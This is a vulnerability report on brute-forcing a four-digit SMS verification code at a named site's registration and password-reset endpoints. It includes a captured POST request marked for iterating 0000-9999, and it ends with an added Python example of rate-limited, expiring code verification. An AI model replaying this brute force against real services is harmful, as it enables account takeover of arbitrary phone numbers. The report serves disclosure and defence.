Registration and password reset for arbitrary mobile phone numbers
No vulnerability exists in the vulnerability list. The first vulnerability is 20RANK.
The phone verification code sent for registration and password reset is only four digits, and there is no limit on the number of attempts.
Verification Code:
Enter any verification code, capture the request on submission, and iterate the verification code over 0000-9999:
POST /User/phoneReg.shtml HTTP/1.1
Host: www.zrbao.com
User-Agent: rv:42.0) Gecko/20100101 Firefox/42.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: https://www.zrbao.com/reg.shtml
Content-Length: 221
Cookie: JSESSIONID=92A2B6CDE6365F56B2AC5EF383E8BAD6-n1; Hm_lvt_b4e112a89209d15dd495141817984363=1448863648; Hm_lpvt_b4e112a89209d15dd495141817984363=1448863666
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

jsonDataSet=%7B%22phone%22%3A%2213333333333%22%2C%22imgCode%22%3A%22afdq%22%2C%22phoneCode%22%3A%22§9999§%22%2C%22pwd%22%3A%22********%22%2C%22recommendUid%22%3A%22%22%2C%22isCheck%22%3Atrue%2C%22logType%22%3A%22web%22%7D
Registered successfully
Login:
Similarly, if you forget your password:
Solution:
You understand.
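One way to close the gap described above, as an added example that is not part of the original report or the site's code: a server-side verification code store that binds each code to a phone number and purpose, expires it, and burns it after a few wrong guesses. The class name, the limits and the in-memory dictionary are assumptions chosen for illustration.

```python
import hmac
import secrets
import time

MAX_ATTEMPTS = 5   # assumed policy: wrong guesses allowed per issued code
CODE_TTL = 300     # assumed policy: code lifetime in seconds
CODE_DIGITS = 6    # longer than the four digits described in the report


class CodeStore:
    """In-memory store (hypothetical); a real service would use a shared cache."""

    def __init__(self, clock=time.monotonic):
        self._clock = clock
        self._codes = {}  # (phone, purpose) -> [code, expires_at, attempts_left]

    def issue(self, phone, purpose):
        """Create a fresh code for one phone and purpose, replacing any old one."""
        code = f"{secrets.randbelow(10 ** CODE_DIGITS):0{CODE_DIGITS}d}"
        self._codes[(phone, purpose)] = [code, self._clock() + CODE_TTL, MAX_ATTEMPTS]
        return code  # goes to the SMS gateway only, never into an HTTP response

    def verify(self, phone, purpose, submitted):
        """Return 'ok', 'wrong', 'expired' or 'locked'. Each code is single use."""
        key = (phone, purpose)
        entry = self._codes.get(key)
        if entry is None:
            return "locked"          # nothing issued, already used, or burned
        code, expires_at, attempts_left = entry
        if self._clock() > expires_at:
            del self._codes[key]
            return "expired"
        # Constant-time comparison on bytes so odd input cannot raise or leak timing.
        if hmac.compare_digest(code.encode(), str(submitted).encode()):
            del self._codes[key]     # consume on success
            return "ok"
        entry[2] = attempts_left - 1
        if entry[2] <= 0:
            del self._codes[key]     # burn the code: a new one must be requested
            return "locked"
        return "wrong"
```

Requests for a new code need their own per-phone and per-client rate limit, otherwise every reissue hands out a fresh set of guesses.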